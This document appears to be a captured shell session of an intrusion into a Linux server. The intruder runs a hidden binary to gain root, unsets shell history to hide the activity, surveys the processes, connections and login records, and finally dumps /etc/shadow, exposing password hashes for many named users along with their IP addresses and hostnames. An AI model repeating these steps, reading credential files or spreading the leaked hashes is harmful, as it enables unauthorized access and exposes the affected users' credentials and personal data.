-rw-r--r-- 1 deadlyacid deadlyacid 120 Sep 13 2006 .gtkrc
-rw------- 1 root root 612 Apr 7 21:50 .viminfo
-rw-r--r-- 1 deadlyacid deadlyacid 658 Sep 13 2006 .zshrc
[deadlyacid@localhost ~]$ cat .bash_history
w
[deadlyacid@localhost ~]$ # Let's have some fun. :)
[deadlyacid@localhost ~]$ id
uid=508(deadlyacid) gid=508(deadlyacid) groups=508(deadlyacid)
[deadlyacid@localhost ~]$ ./.cshrc
[root@localhost ~]# unset HISTFILE ; unset SAVEHIST
[root@localhost ~]# id
uid=0(root) gid=0(root) groups=508(deadlyacid)
[root@localhost ~]# cd ~root
[root@localhost root]# ls -alh
total 219M
drwxr-x--- 36 root root 4.0K May 6 18:14 .
drwxr-xr-x 26 root root 4.0K Jun 5 18:30 ..
-rw-r--r-- 1 root root 14M Oct 24 2006 128 Bit Wep Cracking With Injection!.swf
-rw-r--r-- 1 root root 1.4M Oct 18 2006 59743444-O.jpg
-rw-r--r-- 1 root root 293K Oct 18 2006 all-filters.zip
-rw------- 1 root root 1.6K Jul 4 2006 anaconda-ks.cfg
-rwxr-xr-x 1 root root 5.6K Jul 30 2006 a.out
-rw-r--r-- 1 root root 106K Oct 18 2006 ascgen2-0.7.1.zip
-rw-r--r-- 1 root root 631K Oct 18 2006 background_1024x768.png
-rw-r--r-- 1 root root 470K Oct 18 2006 background.png
-rw------- 1 root root 14K Jun 7 17:36 .bash_history
-rw-r--r-- 1 root root 24 Dec 3 2004 .bash_logout
-rw-r--r-- 1 root root 241 Jan 24 23:00 .bash_profile
-rw-r--r-- 1 root root 176 Dec 3 2004 .bashrc
-rw-r--r-- 1 root root 408K Oct 18 2006 body.ai
drwxr-xr-x 2 root root 4.0K Aug 10 2006 config
-rw-r--r-- 1 root root 8.0K Oct 18 2006 Constitution.txt
-rw-r--r-- 1 root root 100 Dec 3 2004 .cshrc
-rw-rw-r-- 1 Raster Raster 1.8M Jul 4 2006 curl-7.15.4.tar.gz
drwxr-xr-x 2 root root 4.0K Nov 3 2006 Desktop
-rw------- 1 root root 24 Feb 4 03:10 .dmrc
drwxr-xr-x 5 1001 wheel 4.0K Oct 13 2006 dsniff-2.3
-rw-r--r-- 1 root root 580K May 27 2002 dsniff-2.3.tar
-rw-r--r-- 1 root root 124K May 27 2002 dsniff-2.3.tar.gz.1
-rw-r--r-- 1 root root 468K Oct 18 2006 Effects.ai
-rw-r--r-- 1 root root 62K Oct 18 2006 Effects.png
drwxr-x--- 2 root root 4.0K Jul 4 2006 .eggcups
drwx------ 2 root root 4.0K Jan 2 18:46 .elinks
-rw-r--r-- 1 root root 280K Oct 18 2006 epsxe160.zip
-rw------- 1 root root 16 Sep 11 2006 .esd_auth
drwxrwxrwx 19 Raster Raster 12K Sep 2 2006 ethereal-0.99.0
-rw-r--r-- 1 root root 11M Oct 18 2006 framework-2.6.exe
-rw-r--r-- 1 root root 9.2M Oct 18 2006 framework-3.0-beta-1.exe
drwx------ 4 root root 4.0K Mar 21 09:38 .gconf
drwx------ 2 root root 4.0K Mar 21 09:41 .gconfd
drwxr-xr-x 7 root root 4.0K Feb 27 04:29 gd-2.0.34
-rw-r--r-- 1 root root 3.6M Feb 6 19:41 gd-2.0.34.tar
drwxr-xr-x 21 root root 4.0K Oct 5 2006 .gimp-2.2
drwxr-xr-x 3 root root 4.0K Jul 4 2006 .gnome
drwx------ 9 root root 4.0K Feb 24 14:14 .gnome2
drwx------ 2 root root 4.0K Jul 4 2006 .gnome2_private
-rw-r--r-- 1 root root 476K Aug 12 2006 grub.iso
drwxr-xr-x 2 root root 4.0K Jul 4 2006 .gstreamer-0.8
-rw-r--r-- 1 root root 120 May 22 2005 .gtkrc
-rw-r--r-- 1 root root 128 Jul 4 2006 .gtkrc-1.2-gnome2
-rw-r--r-- 1 root root 688K Oct 18 2006 hldsupdatetool.exe
-rw-rw-r-- 1 Raster Raster 6.0M Jul 4 2006 httpd-2.2.2.tar.gz
-rw------- 1 root root 2.3K Feb 24 14:14 .ICEauthority
-rw-r--r-- 1 root root 97K Oct 18 2006 img001.jpg
-rw-r--r-- 1 root root 16M Oct 18 2006 Immigration3.wmv
-rw-r--r-- 1 root root 33K Oct 18 2006 IN CONGRESS.doc
-rw-r--r-- 1 root root 62K Jul 4 2006 install.log
-rw-r--r-- 1 root root 6.1K Jul 4 2006 install.log.syslog
-rw-r--r-- 1 root root 41K Oct 18 2006 Internship quiz .doc
-rw-r--r-- 1 root root 1.7K Jul 27 2006 invison_cookie.php
drwx------ 2 root root 4.0K Jan 24 22:12 .irssi
drwxr-xr-x 3 root root 4.0K Aug 12 2006 iso
drwxr-xr-x 3 root root 4.0K Dec 7 2006 jtr
-rw-r--r-- 1 root root 92K Jun 4 2005 kernel-module-ntfs-2.6.11-1.1369_FC4-2.1.22-0.rr.6.0.i686.rpm
-rw-r--r-- 1 root root 59K Aug 10 2006 KeyGenerator.exe
-rw-r--r-- 1 root root 35M Oct 18 2006 KNOPPIX_V5.0.1CD-2006-06-01-EN.iso
-rw-r--r-- 1 root root 1.7M Oct 18 2006 KNOPPIX_V5.0.1DVD-2006-06-01-EN.iso
drwx------ 3 root root 4.0K Jul 4 2006 .local
-rwxr-xr-x 1 root root 331 Jan 25 11:01 .login
-rwxr-xr-x 1 root root 5.5K Jul 30 2006 lptout
-rw-r--r-- 1 root root 1.2K Jul 30 2006 lptout.c
-rw-r--r-- 1 root root 1.2K Jul 30 2006 lptout.c~
drwx------ 3 root root 4.0K Jul 4 2006 .metacity
drwxr-xr-x 3 root root 4.0K Dec 25 05:20 milk
drwxr-xr-x 3 root root 4.0K Jul 16 2006 .mozilla
-rwxr-xr-x 1 root root 996 Jul 26 2006 msn_bot.php
-rw-r--r-- 1 root root 19M Jul 4 2006 mysql-5.0.22.tar.gz
-rw-r--r-- 1 root root 2.3M Jan 22 22:59 mysql_backup.sql
-rw------- 1 root root 491 Feb 9 16:10 .mysql_history
-rw-rw-r-- 1 Raster Raster 41M Jul 4 2006 mysql-max-5.0.22-linux-i686-glibc23.tar.gz
drwxr-xr-x 3 root root 4.0K Jul 4 2006 .nautilus
drwxr-xr-x 2 root root 4.0K Nov 27 2006 .ncftp
-rw-r--r-- 1 root root 333K Oct 18 2006 netsvwrap.msi
-rw-r--r-- 1 root root 1.1M Oct 18 2006 nmap-4.11-setup.exe
-rw-r--r-- 1 root root 80K Oct 18 2006 OggMux-0.9.5.1.zip
drwxr-xr-x 3 root root 4.0K Sep 11 2006 .openoffice.org2.0
-rw-rw-r-- 1 Raster Raster 7.8M Jul 4 2006 php-5.1.4.tar.gz
drwxr-xr-x 9 4327 409 4.0K Jan 2 18:53 pine4.64
-rw-r--r-- 1 root root 4.1M Jan 2 18:46 pine4.64.tar.gz
-rw-r--r-- 1 root root 635K Oct 18 2006 Pj64 Build 52 2001-12-22.zip
-rw-r--r-- 1 root root 4.5K Oct 18 2006 podcast.GRF
-rw-r--r-- 1 root root 15M Oct 18 2006 podcast.ogg
-rw-r--r-- 1 root root 24K Oct 18 2006 preamble words.doc
-rw-r--r-- 1 root root 741K Oct 18 2006 prea.wma
-rw-r--r-- 1 root root 454K Oct 18 2006 privoxy_setup_3_0_5.exe
-rw-r--r-- 1 root root 736K Oct 18 2006 Rasterized_background.ai
-rw-r--r-- 1 root root 544K Oct 18 2006 Rasterized_background.png
-rw------- 1 root root 15K Oct 30 2006 .recently-used
drwxr-xr-x 2 root root 4.0K Jan 4 21:57 reg
-rw------- 1 root root 497 Jul 4 2006 .rhn-applet.conf
-rw-r--r-- 1 root root 449K Oct 18 2006 Rose.ai
-rw-r--r-- 1 root root 609K Oct 18 2006 saminside.zip
-rw-r--r-- 1 root root 1019K Oct 18 2006 sc32r240.exe
-rw-r--r-- 1 root root 3.1K Oct 18 2006 SCHOLARSHIPADDRESSES.xls
-rw-r--r-- 1 root root 322 Jul 30 2006 server.php
drwxr-xr-- 6 root root 4.0K Jul 4 2006 serverutils
-rw-r--r-- 1 root root 400K Oct 18 2006 Shannon_Kliffmueller_Brush.ai
-rw-r--r-- 1 root root 39K Oct 18 2006 Shannon_Kliffmueller_test1.doc
-rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_botA.php
-rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot_line.php
-rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot^.php
-rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot_.php
-rw-r--r-- 1 root root 4.8K Aug 13 2006 skeleton_bot.php
-rw-r--r-- 1 root root 1.1M Oct 18 2006 smbat_win32bin_1.0.4.zip
-rw-r--r-- 1 root root 167K Oct 18 2006 Sniphere.exe
-rw-r--r-- 1 root root 271K Oct 18 2006 sockscapv235bynitrous_EvGnAzOrKoGxSlXc.zip
-rw-r--r-- 1 root root 337 Jul 8 2006 somthing
drwx------ 2 root root 4.0K Sep 1 2006 .ssh
drwxr-x--- 2 root root 4.0K Apr 14 16:38 .steam
-rw-r--r-- 1 root root 714K Oct 18 2006 SteamInstall.exe
-rw-r--r-- 1 root root 5.7M Oct 18 2006 stick.fla
-rw-r--r-- 1 root root 2.5K Oct 18 2006 stick.swf
-rw-r--r-- 1 root root 129 Dec 3 2004 .tcshrc
drwx------ 4 root root 4.0K Jul 16 2006 .thumbnails
-rw-r--r-- 1 root root 183 Nov 27 2006 tmp
-rw-r--r-- 1 root root 47 Oct 18 2006 Torrent downloaded from Demonoid.com.txt
-rw-r--r-- 1 root root 1.1K Sep 30 2006 torrent.php
drwx------ 6 root root 4.0K Oct 5 2006 .Trash
-rw------- 1 root root 1.1K May 6 18:14 .viminfo
-rw-r--r-- 1 root root 2.6M Oct 18 2006 Virtual Chess 64.7z
-rw-r--r-- 1 root root 9.8K Oct 18 2006 VolumeC.txt
-rw-r--r-- 1 root root 1.2M Oct 18 2006 vti.zip
drwx------ 2 root root 4.0K Feb 24 17:26 .w3m
drwxr-xr-x 2 root root 20K Nov 8 2006 win31d
-rw-r--r-- 1 root root 622K Oct 18 2006 winima80.exe
-rw-r--r-- 1 root root 8.7M Nov 8 2006 win.iso
-rw-r--r-- 1 root root 980K Oct 18 2006 Xeon_10.rar
drwxrwxrwx 11 1005 1005 4.0K Oct 30 2006 xine-lib-1.1.2
-rw-r--r-- 1 root root 625K Oct 18 2006 zsnesw142.zip
[root@localhost root]# ps aux
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 1740 576 ? Ss Jun05 0:01 init [3]
root 2 0.0 0.0 0 0 ? SN Jun05 0:00 [ksoftirqd/0]
root 3 0.0 0.0 0 0 ? S Jun05 0:00 [watchdog/0]
root 4 0.0 0.0 0 0 ? S< Jun05 0:00 [events/0]
root 5 0.0 0.0 0 0 ? S< Jun05 0:00 [khelper]
root 6 0.0 0.0 0 0 ? S< Jun05 0:00 [kthread]
root 56 0.0 0.0 0 0 ? S< Jun05 0:00 [kblockd/0]
root 57 0.0 0.0 0 0 ? S< Jun05 0:00 [kacpid]
root 133 0.0 0.0 0 0 ? S< Jun05 0:00 [ksuspend_usbd]
root 136 0.0 0.0 0 0 ? S< Jun05 0:00 [khubd]
root 138 0.0 0.0 0 0 ? S< Jun05 0:00 [kseriod]
root 158 0.0 0.0 0 0 ? S Jun05 0:00 [pdflush]
root 159 0.0 0.0 0 0 ? S Jun05 0:00 [pdflush]
root 160 0.0 0.0 0 0 ? S< Jun05 0:00 [kswapd0]
root 161 0.0 0.0 0 0 ? S< Jun05 0:00 [aio/0]
root 327 0.0 0.0 0 0 ? S< Jun05 0:00 [kpsmoused]
root 346 0.0 0.0 0 0 ? S< Jun05 0:00 [kmirrord]
root 353 0.0 0.0 0 0 ? S< Jun05 0:00 [ksnapd]
root 366 0.0 0.0 0 0 ? S< Jun05 0:02 [kjournald]
root 817 0.0 0.1 1628 516 ? S<s Jun05 0:00 udevd
root 1425 0.0 0.0 0 0 ? S< Jun05 0:00 [kjournald]
root 1737 0.0 0.1 1608 560 ? Ss Jun05 0:00 syslogd -m 0
root 1739 0.0 0.0 1564 392 ? Ss Jun05 0:00 klogd -x
rpc 1756 0.0 0.1 1684 528 ? Ss Jun05 0:00 portmap
rpcuser 1774 0.0 0.1 1732 704 ? Ss Jun05 0:00 rpc.statd
root 1788 0.0 0.0 9852 444 ? S<sl Jun05 0:00 auditd
root 1792 0.0 0.0 0 0 ? S< Jun05 0:00 [kauditd]
root 1822 0.0 0.0 4376 380 ? Ss Jun05 0:00 rpc.idmapd
root 1835 0.0 0.1 2152 684 ? Ss Jun05 0:00 hcid: processin
root 1839 0.0 0.0 1604 476 ? Ss Jun05 0:00 sdpd
root 1869 0.0 0.0 0 0 ? S< Jun05 0:00 [krfcommd]
root 2030 0.0 0.1 1792 700 ? Ss Jun05 0:00 /usr/sbin/autom
root 2043 0.0 0.1 1784 688 ? Ss Jun05 0:00 /usr/sbin/autom
root 2057 0.0 0.0 2732 440 ? Ss Jun05 0:00 nifd -n
nobody 2088 0.0 0.1 11380 952 ? Ssl Jun05 0:00 mDNSResponder
root 2097 0.0 0.0 1556 464 ? Ss Jun05 0:00 /usr/sbin/acpid
root 2106 0.0 0.3 8232 1872 ? Ss Jun05 0:00 cupsd
root 2176 0.0 0.2 4376 1068 ? Ss Jun05 0:04
/usr/sbin/sshd
ntp 2187 0.0 0.7 4040 4040 ? SLs Jun05 0:00 ntpd -u ntp:ntp
root 2248 0.0 0.2 4376 1248 ? S Jun05 0:00 /bin/sh /usr/bi
mysql 2283 0.1 3.9 115344 20456 ? Sl Jun05 10:04 /usr/libexec/my
nobody 2308 0.0 0.2 5240 1096 ? Ss Jun05 0:00 proftpd: (accep
root 2325 0.0 0.4 7944 2072 ? Ss Jun05 0:00 sendmail: accep
smmsp 2331 0.0 0.3 6948 1668 ? Ss Jun05 0:00 sendmail: Queue
root 2340 0.0 0.0 1772 348 ? Ss Jun05 0:00 gpm -m /dev/inp
root 2348 0.0 0.1 4540 948 ? Ss Jun05 0:00 crond
xfs 2369 0.0 0.2 3356 1492 ? Ss Jun05 0:00 xfs -droppriv -
root 2384 0.0 0.0 1784 432 ? Ss Jun05 0:00 /usr/sbin/atd
dbus 2392 0.0 0.1 2552 852 ? Ss Jun05 0:00 dbus-daemon --s
root 2403 0.0 0.1 2928 968 ? Ss Jun05 0:00 cups-config-dae
root 2412 0.0 0.4 4196 2364 ? Ss Jun05 0:00 hald --retain-p
root 2417 0.0 0.1 2132 692 ? S Jun05 0:00 hald-addon-acpi
root 2433 0.0 0.1 2136 712 ? S Jun05 1:09 hald-addon-stor
root 2437 0.0 0.1 2140 708 ? S Jun05 0:00 hald-addon-stor
root 2449 0.0 0.0 1544 420 tty2 Ss+ Jun05 0:00 /sbin/mingetty
root 2450 0.0 0.0 1548 428 tty3 Ss+ Jun05 0:00 /sbin/mingetty
root 2451 0.0 0.0 1548 428 tty4 Ss+ Jun05 0:00 /sbin/mingetty
root 2452 0.0 0.0 1544 424 tty5 Ss+ Jun05 0:00 /sbin/mingetty
root 2453 0.0 0.0 1544 424 tty6 Ss+ Jun05 0:00 /sbin/mingetty
root 2606 0.0 0.2 4040 1344 ? S Jun05 0:00 ntpd -u ntp:ntp
root 7034 0.0 1.2 14480 6248 ? Ss Jun06 0:00 /www/bin/httpd
daemon 7035 0.0 1.1 14624 6032 ? S Jun06 0:00 /www/bin/httpd
daemon 7036 0.0 1.1 14616 6048 ? S Jun06 0:00 /www/bin/httpd
daemon 7037 0.0 1.1 14720 6052 ? S Jun06 0:00 /www/bin/httpd
daemon 7038 0.0 1.1 14608 5984 ? S Jun06 0:00 /www/bin/httpd
daemon 7039 0.0 1.1 14740 6044 ? S Jun06 0:00 /www/bin/httpd
root 7059 0.0 0.3 8136 1600 ? Ss Jun06 0:00 smbmount \\RAST
root 7071 0.0 0.0 0 0 ? S< Jun06 0:01 [smbiod]
root 7073 0.0 0.3 8136 1748 ? Ss Jun06 0:00 smbmount \\RAST
daemon 7427 0.0 1.1 14740 6052 ? S Jun06 0:00 /www/bin/httpd
root 12063 0.0 0.0 1544 424 tty1 Ss+ Jun07 0:00 /sbin/mingetty
gumbie 19619 0.0 0.2 5164 1492 ? Ss Jun06 0:00 SCREEN -e^Tt
gumbie 19620 0.0 0.2 4508 1488 pts/2 Ss+ Jun06 0:00 /bin/bash
ircd 19711 0.0 0.7 6516 3676 ? S Jun06 0:38 /home/ircd/Unre
gumbie 20214 0.0 0.2 4512 1488 pts/3 Ss Jun06 0:00 /bin/bash
root 20232 0.0 0.2 4408 1160 pts/3 S Jun06 0:00 su -
root 20233 0.0 0.2 4508 1512 pts/3 S Jun06 0:00 -bash
root 20380 0.0 0.1 3924 616 pts/3 T Jun06 0:00 tail -F /var/lo
root 20972 0.0 0.4 7236 2224 ? Ss 17:09 0:00 sshd: deadlyaci
508 20975 0.0 0.3 7236 1660 ? S 17:09 0:00 sshd: deadlyaci
508 20976 0.0 0.2 4376 1420 pts/0 Ss 17:09 0:00 -bash
root 21065 0.0 0.2 4380 1412 pts/0 S 17:12 0:00 /bin/bash
root 21099 0.0 0.1 4480 920 pts/0 R+ 17:13 0:00 ps aux
root 22638 0.9 0.5 7500 3008 ? S Jun06 42:18 /sbin/mingetty
gumbie 28145 0.0 0.2 4512 1488 pts/4 Ss Jun06 0:00 /bin/bash
root 28163 0.0 0.2 4412 1160 pts/4 S Jun06 0:00 su -
root 28166 0.0 0.2 4512 1480 pts/4 S+ Jun06 0:00 -bash
root 29438 0.0 0.2 4408 1160 pts/3 S Jun08 0:00 su - ircd
ircd 29439 0.0 0.2 4508 1496 pts/3 S+ Jun08 0:00 -bash
daemon 29803 0.0 1.1 14624 5940 ? S Jun08 0:00 /www/bin/httpd
[root@localhost root]# netstat -anvp
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:8067 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6661 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6662 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6663 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:37383 0.0.0.0:* LISTEN 1774/rpc.statd
tcp 0 0 0.0.0.0:6664 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6665 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6666 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 2283/mysqld
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6668 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6669 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:6670 0.0.0.0:* LISTEN 19711/ircd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 1756/portmap
tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN 2106/cupsd
tcp 0 0 127.0.0.1:5335 0.0.0.0:* LISTEN 2088/mDNSResponder
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 2325/sendmail: acce
tcp 0 0 192.168.39.2:6667 68.184.61.212:65190 ESTABLISHED 19711/ircd
tcp 0 0 192.168.39.2:6667 74.69.17.126:3679 ESTABLISHED 19711/ircd
tcp 0 0 192.168.39.2:6697 74.69.17.126:1081 ESTABLISHED 19711/ircd
tcp 0 0 192.168.39.2:6667 192.168.38.254:4257 ESTABLISHED 19711/ircd
tcp 0 275 192.168.39.2:6667 87.228.211.185:33726 ESTABLISHED 19711/ircd
tcp 0 0 192.168.39.2:6667 68.184.61.212:55636 ESTABLISHED 19711/ircd
tcp 0 0 192.168.39.2:58182 80.248.208.223:8067 ESTABLISHED 19711/ircd
tcp 0 0 192.168.39.2:6667 85.210.140.33:1075 ESTABLISHED 19711/ircd
tcp 0 0 :::2121 :::* LISTEN 2308/proftpd: (acce
tcp 0 0 :::80 :::* LISTEN 7034/httpd
tcp 0 0 :::443 :::* LISTEN 2176/sshd
tcp 0 4032 ::ffff:192.168.39.2:443 ::ffff:68.110.245.75:42225 ESTABLISHED 20972/sshd: deadlya
udp 0 0 0.0.0.0:32769 0.0.0.0:* 1774/rpc.statd
udp 0 0 0.0.0.0:678 0.0.0.0:* 1774/rpc.statd
udp 0 0 0.0.0.0:5353 0.0.0.0:* 2088/mDNSResponder
udp 0 0 0.0.0.0:111 0.0.0.0:* 1756/portmap
udp 0 0 0.0.0.0:631 0.0.0.0:* 2106/cupsd
udp 0 0 192.168.1.104:123 0.0.0.0:* 2187/ntpd
udp 0 0 127.0.0.1:123 0.0.0.0:* 2187/ntpd
udp 0 0 0.0.0.0:123 0.0.0.0:* 2187/ntpd
udp 0 0 :::123 :::* 2187/ntpd
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node PID/Program name Path
unix 2 [ ACC ] STREAM LISTENING 6161 2369/xfs /tmp/.font-unix/fs7100
unix 2 [ ACC ] STREAM LISTENING 5947 2308/proftpd: (acce /var/run/proftpd/proftpd.sock
unix 2 [ ACC ] STREAM LISTENING 5340 1839/sdpd /var/run/sdp
unix 2 [ ACC ] STREAM LISTENING 5598 2097/acpid /var/run/acpid.socket
unix 2 [ ACC ] STREAM LISTENING 6346 2412/hald @/tmp/hald-local/dbus-8cOmtkhurl
unix 2 [ ACC ] STREAM LISTENING 6200 2392/dbus-daemon /var/run/dbus/system_bus_socket
unix 2 [ ] DGRAM 3321 817/udevd @udevd
unix 2 [ ACC ] STREAM LISTENING 6017 2308/proftpd: (acce /var/run/proftpd/proftpd.sock
unix 2 [ ACC ] STREAM LISTENING 5917 2283/mysqld /var/lib/mysql/mysql.sock
unix 2 [ ] DGRAM 6347 2412/hald @/var/run/hal/hotplug_socket2
unix 16 [ ] DGRAM 5069 1737/syslogd /dev/log
unix 2 [ ACC ] STREAM LISTENING 6121 2340/gpm /dev/gpmctl
unix 3 [ ] STREAM CONNECTED 1239792 20972/sshd: deadlya
unix 3 [ ] STREAM CONNECTED 1239791 20975/0
unix 2 [ ] DGRAM 257889 19711/ircd
unix 2 [ ] DGRAM 74470 7073/smbmount
unix 2 [ ] DGRAM 74424 7059/smbmount
unix 2 [ ] DGRAM 7179 2606/ntpd
unix 3 [ ] STREAM CONNECTED 6601 2392/dbus-daemon /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 6600 2412/hald
unix 3 [ ] STREAM CONNECTED 6590 2412/hald @/tmp/hald-local/dbus-8cOmtkhurl
unix 3 [ ] STREAM CONNECTED 6587 2437/hald-addon-sto
unix 3 [ ] STREAM CONNECTED 6575 2412/hald @/tmp/hald-local/dbus-8cOmtkhurl
unix 3 [ ] STREAM CONNECTED 6572 2433/hald-addon-sto
unix 3 [ ] STREAM CONNECTED 6514 2097/acpid /var/run/acpid.socket
unix 3 [ ] STREAM CONNECTED 6513 2417/hald-addon-acp
unix 3 [ ] STREAM CONNECTED 6520 2412/hald @/tmp/hald-local/dbus-8cOmtkhurl
unix 3 [ ] STREAM CONNECTED 6512 2417/hald-addon-acp
unix 3 [ ] STREAM CONNECTED 6335 2392/dbus-daemon /var/run/dbus/system_bus_socket
unix 3 [ ] STREAM CONNECTED 6334 2403/cups-config-da
unix 3 [ ] STREAM CONNECTED 6205 2392/dbus-daemon
unix 3 [ ] STREAM CONNECTED 6204 2392/dbus-daemon
unix 2 [ ] DGRAM 6118 2348/crond
unix 2 [ ] DGRAM 6106 2340/gpm
unix 2 [ ] DGRAM 6096 2331/clientmqueue
unix 2 [ ] DGRAM 6088 2325/sendmail: acce
unix 2 [ ] DGRAM 5818 2187/ntpd
unix 2 [ ] DGRAM 5288 1839/sdpd
unix 2 [ ] DGRAM 5286 1835/hcid: processi
unix 3 [ ] STREAM CONNECTED 5270 1822/rpc.idmapd
unix 3 [ ] STREAM CONNECTED 5269 1822/rpc.idmapd
unix 2 [ ] DGRAM 5162 1788/auditd
unix 2 [ ] DGRAM 5122 1774/rpc.statd
unix 2 [ ] DGRAM 5072 1739/klogd
netstat: no support for `AF IPX' on this system.
netstat: no support for `AF AX25' on this system.
netstat: no support for `AF X25' on this system.
netstat: no support for `AF NETROM' on this system.
[root@localhost root]# lastlog
Username Port From Latest
root pts/0 rastering.raster Tue Jun 5 20:50:25 -0400 2007
bin **Never logged in**
daemon **Never logged in**
adm **Never logged in**
lp **Never logged in**
sync **Never logged in**
shutdown **Never logged in**
halt **Never logged in**
mail **Never logged in**
news **Never logged in**
uucp **Never logged in**
operator **Never logged in**
games **Never logged in**
gopher **Never logged in**
ftp **Never logged in**
nobody **Never logged in**
dbus **Never logged in**
vcsa **Never logged in**
rpm **Never logged in**
haldaemon **Never logged in**
pcap **Never logged in**
nscd **Never logged in**
named **Never logged in**
netdump **Never logged in**
sshd **Never logged in**
rpc **Never logged in**
mailnull **Never logged in**
smmsp **Never logged in**
rpcuser **Never logged in**
nfsnobody **Never logged in**
apache **Never logged in**
xfs **Never logged in**
ntp **Never logged in**
gdm **Never logged in**
Raster pts/12 pix3.ircc.edu Thu Jan 25 10:07:47 -0500 2007
mysql **Never logged in**
superman **Never logged in**
wraith pts/8 c-67-180-5-3.hsd Fri Dec 29 11:29:05 -0500 2006
gumbie pts/0 c-24-34-223-184. Fri Jun 8 22:54:48 -0400 2007
ircd pts/0 vds221.sivit.org Sun Mar 25 05:23:25 -0400 2007
neokat pts/2 192.168.1.1 Mon Sep 18 00:54:55 -0400 2006
deadlyacid pts/0 ip68-110-245-75. Sat Jun 9 17:09:36 -0400 2007
logan pts/2 192.168.1.102 Sun Sep 17 08:19:19 -0400 2006
DJDD pts/0 216.186.154.117 Fri Jun 8 10:50:56 -0400 2007
Toad **Never logged in**
zaratul2 pts/1 89.108.147.43 Wed Dec 20 02:53:45 -0500 2006
bartek **Never logged in**
strayfe pts/0 ip68-110-245-75. Thu Jun 7 18:17:19 -0400 2007
kisp **Never logged in**
furryuser **Never logged in**
boost pts/9 tec21.lib.uci.ed Mon Jan 22 00:45:54 -0500 2007
neon pts/1 75-18-248-88.lig Tue May 22 00:30:42 -0400 2007
jindaronin pts/8 pix3.ircc.edu Mon Jan 8 11:24:45 -0500 2007
CdPirate pts/1 213-94-233-36.b- Thu Feb 15 18:55:52 -0500 2007
stax pts/0 213.251.160.26 Fri Jun 8 01:13:45 -0400 2007
shoutcast **Never logged in**
brandonyu2000 **Never logged in**
[root@localhost root]# cat /etc/shadow
root:$1$okCxorzm$hEMPGKBXI0stf4p6GSwvN.:13521:0:99999:7:::
bin:*:13333:0:99999:7:::
daemon:*:13333:0:99999:7:::
adm:*:13333:0:99999:7:::
lp:*:13333:0:99999:7:::
sync:*:13333:0:99999:7:::
shutdown:*:13333:0:99999:7:::
halt:*:13333:0:99999:7:::
mail:*:13333:0:99999:7:::
news:*:13333:0:99999:7:::
uucp:*:13333:0:99999:7:::
operator:*:13333:0:99999:7:::
games:*:13333:0:99999:7:::
gopher:*:13333:0:99999:7:::
ftp:*:13333:0:99999:7:::
nobody:*:13333:0:99999:7:::
dbus:!!:13333:0:99999:7:::
vcsa:!!:13333:0:99999:7:::
rpm:!!:13333:0:99999:7:::
haldaemon:!!:13333:0:99999:7:::
pcap:!!:13333:0:99999:7:::
nscd:!!:13333:0:99999:7:::
named:!!:13333:0:99999:7:::
netdump:!!:13333:0:99999:7:::
sshd:!!:13333:0:99999:7:::
rpc:!!:13333:0:99999:7:::
mailnull:!!:13333:0:99999:7:::
smmsp:!!:13333:0:99999:7:::
rpcuser:!!:13333:0:99999:7:::
nfsnobody:!!:13333:0:99999:7:::
apache:!!:13333:0:99999:7:::
xfs:!!:13333:0:99999:7:::
ntp:!!:13333:0:99999:7:::
gdm:!!:13333:0:99999:7:::
Raster:$1$WKVJX2Pp$9FkdPO1dhJJB.eM7nVdjV.:13333:0:99999:7:::
mysql:!!:13334:0:99999:7:::
superman:$1$JREHk48N$JLYAZDwyRqWX.omqcWDaX0:13356:0:99999:7:::
wraith:$1$MT0lRqTc$LwZrErC2EUmnq0K2sPQq9/:13411:0:99999:7:::
gumbie:$1$wQXJROLG$xk6bVLvf8LrO6HMVMQQtC1:13597:0:99999:7:::
ircd:$1$XDSLbLdB$oNcoI9IV/WCoT0B5/Vb8H1:13435:0:99999:7:::
neokat:$1$vzq6ZeUU$ae0bIwmKnuYrj.5wiR/hG.:13409:0:99999:7:::
deadlyacid:$1$bH6/nUAL$/uT/7OBWKu.Xb8GhVh1sM0:13611:0:99999:7:::
logan:$1$7LaZ3XKs$T7kS.wk6UZWfvj6eXbJwX/:13424:0:99999:7:::
DJDD:$1$JbZ5.0XQ$3F5SjVVa5R71Tr1byc9f31:13435:0:99999:7:::
Toad:$1$9dsIny1N$WbG8JTQyVGEEQnt6huS1M.:13454:0:99999:7:::
zaratul2:$1$TTQlT1UP$hqEBYiiB9st7IezCjkXOH.:13444:0:99999:7:::
bartek:$1$PaUoBcTi$RI47yR5Nf83lHv0oe.O0v1:13444:0:99999:7:::
strayfe:$1$WgoDCa/j$JLaGM65FpLqIlOoyGaGC9.:13530:0:99999:7:::
kisp:$1$7Xbrg7zy$QU3GUj61UAcYIdNuskVJ1/:13456:0:99999:7:::
furryuser:$1$MbCPkH5O$fS082sBDXi93Ap80gF8ry0:13479:0:99999:7:::
boost:$1$Wu1oglAf$4xrCXb3eaBMyJD..3Lxnv1:13504:0:99999:7:::
neon:$1$ne3jQHS3$mQnUKSpPhxTXxkfAYL0W..:13510:0:99999:7:::
